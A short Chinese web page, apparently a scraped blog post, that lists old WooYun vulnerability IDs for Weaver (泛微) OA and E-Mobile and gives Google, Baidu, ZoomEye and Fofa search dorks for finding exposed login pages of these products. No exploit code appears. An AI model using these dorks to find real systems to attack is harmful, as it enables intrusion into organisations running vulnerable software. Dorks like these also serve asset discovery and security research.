    wooyun-2015-0125265(未找到相关信息)
    wooyun-2010-07497(未找到相关信息)
    wooyun-2010-034523(未找到相关信息)

    谷歌搜索 allintext: 用户名: 密码: 记住密码. 自动登录. E-Mobile
    百度dork:泛微协同商务系统
    ZoomEye搜索泛微/

    Fofa Dork app="泛微-协同办公OA"

  • 相关阅读:
    kafka 学习笔记
    awk命令详解
    apache 的 配置项
    Apache 的 httpd.conf 详解
    如何设置httpd-mpm-conf的参数
    apache 服务器概述--安装(一)
    centos 修改时区
    docker(三)docker镜像和镜像发布方法
    docker(二)部署docker容器虚拟化平台
    sql的存储过程使用详解--基本语法
  • 原文地址:https://www.cnblogs.com/AtesetEnginner/p/13185614.html
Copyright © 2020-2023  润新知